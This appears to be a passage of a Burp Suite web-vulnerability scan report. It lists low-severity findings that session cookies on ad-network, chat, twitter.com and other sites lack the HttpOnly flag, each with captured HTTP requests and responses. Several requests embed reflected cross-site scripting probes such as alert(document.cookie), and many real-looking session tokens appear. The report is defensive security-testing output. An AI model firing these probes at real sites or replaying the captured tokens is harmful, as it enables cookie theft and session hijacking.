11.3. http://ads.adxpose.com/ads/ads.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ads.adxpose.com
Path:	/ads/ads.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=FC8FA945550B733F43B55297886838C8; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/ads.js?uid=7hSy8PbjRnOXSf2i_40364845 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FC8FA945550B733F43B55297886838C8; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 28 Jan 2011 15:00:09 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...

11.4. http://ads.adxpose.com/ads/tag.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ads.adxpose.com
Path:	/ads/tag.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=DF1B104B3D685EBD40E943AD4EEF4B96; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/tag.js?uid=M6uzDYEbWGBrvdnp_69537&cid=EI9-DR-Interclick&vchannel=12553&altbannerurl=http%253A%252F%252Fa1.interclick.com%252FgetInPage.aspx%253Fa%253D54%25252c55%2526b%253D12553%2526cid%253D1211388088786%2526isif%253Df%2526rurld%253Dwww.cbs6albany.com%2526sl%253Dtrue%2526dvp%253Dhttp%25253A%252F%252Fwww.cbs6albany.com%252Falbany-weather-forecast%25253Fdec0c%252527%2525253E%2525253Cscript%2525253Ealert%252528document.cookie%252529%2525253C%252Fscript%2525253E262a2c2a00e%25253D1%2526rurl%253Dhttp%25253A%25252F%25252Fburp%25252Fshow%25252F70%2526blkAdxp%253D1 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/albany-weather-forecast?dec0c'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E262a2c2a00e=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DF1B104B3D685EBD40E943AD4EEF4B96; Path=/
Content-Type: text/javascript;charset=UTF-8
Content-Length: 845
Date: Sat, 29 Jan 2011 13:38:46 GMT
Connection: close

__ADXPOSE_PREFS__ = {"uid":"M6uzDYEbWGBrvdnp_69537","altbannerurl":"http%3A%2F%2Fa1.interclick.com%2FgetInPage.aspx%3Fa%3D54%252c55%26b%3D12553%26cid%3D1211388088786%26isif%3Df%26rurld%3Dwww.cbs6alban
...[SNIP]...

11.5. http://ads2.adbrite.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ads2.adbrite.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=61FCC3DEA075A87386A0EA6878423D23; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; vsd="0@1@4d430048@searchportal.information.com"; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0:806205:20861280:21d8e954-2b06-11e0-8e8a-0025900870d2:0"; srh=1%3Aq64FAA%3D%3D

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=61FCC3DEA075A87386A0EA6878423D23; Path=/
Location: http://bounce.adbrite.com/
Content-Type: text/html
Date: Sat, 29 Jan 2011 14:20:55 GMT
Connection: close

11.6. http://base.liveperson.net/visitor/addons/deploy.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://base.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDQQRSRACD=EJCEGDPBIPCHGMBALKMGHIFF; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=5296924&d_id=1 HTTP/1.1
Host: base.liveperson.net
Proxy-Connection: keep-alive
Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101423669632,d=1294435351

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:03:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-type: application/x-javascript
max-age: 1800
Last-Modified: Fri, 07 Jan 2011 16:10:14 GMT
Content-Length: 16698
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQRSRACD=EJCEGDPBIPCHGMBALKMGHIFF; path=/
Cache-control: public

lpAddMonitorTag();
//DO NOT CHANGE THE BELOW COMMENT
//PLUGINS_LIST=globalUtils,inputboxHandler
if (typeof(lpMTagConfig.plugins)=='undefined') { lpMTagConfig.plugins = {};}

lpMTagConfig.plugins[
...[SNIP]...

11.7. http://base.liveperson.net/visitor/addons/deploy.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://base.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 13:59:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-type: application/x-javascript
max-age: 1800
Last-Modified: Fri, 07 Jan 2011 16:10:14 GMT
Content-Length: 16698
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; path=/
Cache-control: public

lpAddMonitorTag();
//DO NOT CHANGE THE BELOW COMMENT
//PLUGINS_LIST=globalUtils,inputboxHandler
if (typeof(lpMTagConfig.plugins)=='undefined') { lpMTagConfig.plugins = {};}

lpMTagConfig.plugins[
...[SNIP]...

11.8. http://boston30.autochooser.com/results.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://boston30.autochooser.com
Path:	/results.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDSSQCBSCQ=ILBLDIICKPOMNHFEBBFBBIPG; path=/
cid=4473401; expires=Tue, 25-Dec-2012 05:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp HTTP/1.1
Host: boston30.autochooser.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.9. http://event.adxpose.com/event.flow previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://event.adxpose.com
Path:	/event.flow

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=F7984D788D573EFCDF0206C9A4486038; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.soundingsonline.com%2Fnews%2Fmishaps-a-rescues%2F272642-mishaps-a-rescues-connecticut-and-new-york-jan%3F'%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert(0x00241B)%253C%2Fscript%253E&uid=7hSy8PbjRnOXSf2i_40364845&xy=104%2C60&wh=1155%2C1012&vchannel=bzo.847.CD39C435!&cid=5196052&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=16&flash=10.1&iframed=0 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F7984D788D573EFCDF0206C9A4486038; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 106
Date: Fri, 28 Jan 2011 15:00:16 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("7hSy8PbjRnOXSf2i_40364845");

11.10. http://imlive.com/homepagems3.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://imlive.com
Path:	/homepagems3.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; path=/
imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.11. http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://imlive.com
Path:	/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; path=/
imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Referer: http://burp/show/1
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; __utmb=71081352.2.10.1296223202; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; BIGipServerImlive=2417231426.20480.0000

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:05:46 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
Set-Cookie: ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:05:46 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 8407

<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

11.12. http://local.nissanusa.com/zip.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://local.nissanusa.com
Path:	/zip.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=a3osnfcnbh4c5bqf8iouogi697; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /zip.aspx HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Fri, 28 Jan 2011 16:59:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 28 Jan 2011 16:59:34 GMT
Content-Length: 15938
Connection: close
Set-Cookie: PHPSESSID=a3osnfcnbh4c5bqf8iouogi697; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

11.13. http://support.moxiesoft.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://support.moxiesoft.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDQCSSSRRR=PBGDKLDBKDBENNBAFHOIFDGM; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: support.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.14. http://twitter.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224736-35616-58920
ETag: "ce84c6d523ac490f74725d4e72e7cdcf"
Last-Modified: Fri, 28 Jan 2011 14:25:36 GMT
X-Runtime: 0.01412
Content-Type: text/html; charset=utf-8
Content-Length: 44218
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...

11.15. http://twitter.com/247realmedia previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/247realmedia

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTdiYTgzYzg5NjU0NmY1NzY5NjRmYzhiZDczOGFiZTQzIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIOWr7zC0B--30505dd0f6c83aaf558b61083089f58bf8eaf3f1; domain=.twitter.com; path=/
k=173.193.214.243.1296224184721837; path=/; expires=Fri, 04-Feb-11 14:16:24 GMT; domain=.twitter.com
guest_id=12962241848871382; path=/; expires=Sun, 27 Feb 2011 14:16:24 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /247realmedia HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:16:24 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224184-14398-11076
ETag: "7215ee9c7d9dc229d2921a40e899ec5f"
Last-Modified: Fri, 28 Jan 2011 14:16:24 GMT
X-Runtime: 0.01356
Content-Type: text/html; charset=utf-8
Content-Length: 1
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296224184721837; path=/; expires=Fri, 04-Feb-11 14:16:24 GMT; domain=.twitter.com
Set-Cookie: guest_id=12962241848871382; path=/; expires=Sun, 27 Feb 2011 14:16:24 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTdiYTgzYzg5NjU0NmY1NzY5NjRmYzhiZDczOGFiZTQzIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIOWr7zC0B--30505dd0f6c83aaf558b61083089f58bf8eaf3f1; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

11.16. http://twitter.com/AddThis previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/AddThis

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--a144f2d48721ec13cc6db17b0167bf7e0dce4447; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AddThis HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.17. http://twitter.com/Applebees previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/Applebees

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Applebees HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.18. http://twitter.com/AshieApple previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/AshieApple

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AshieApple HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.19. http://twitter.com/Beckett_News previous next

Summary

Severity:	Low
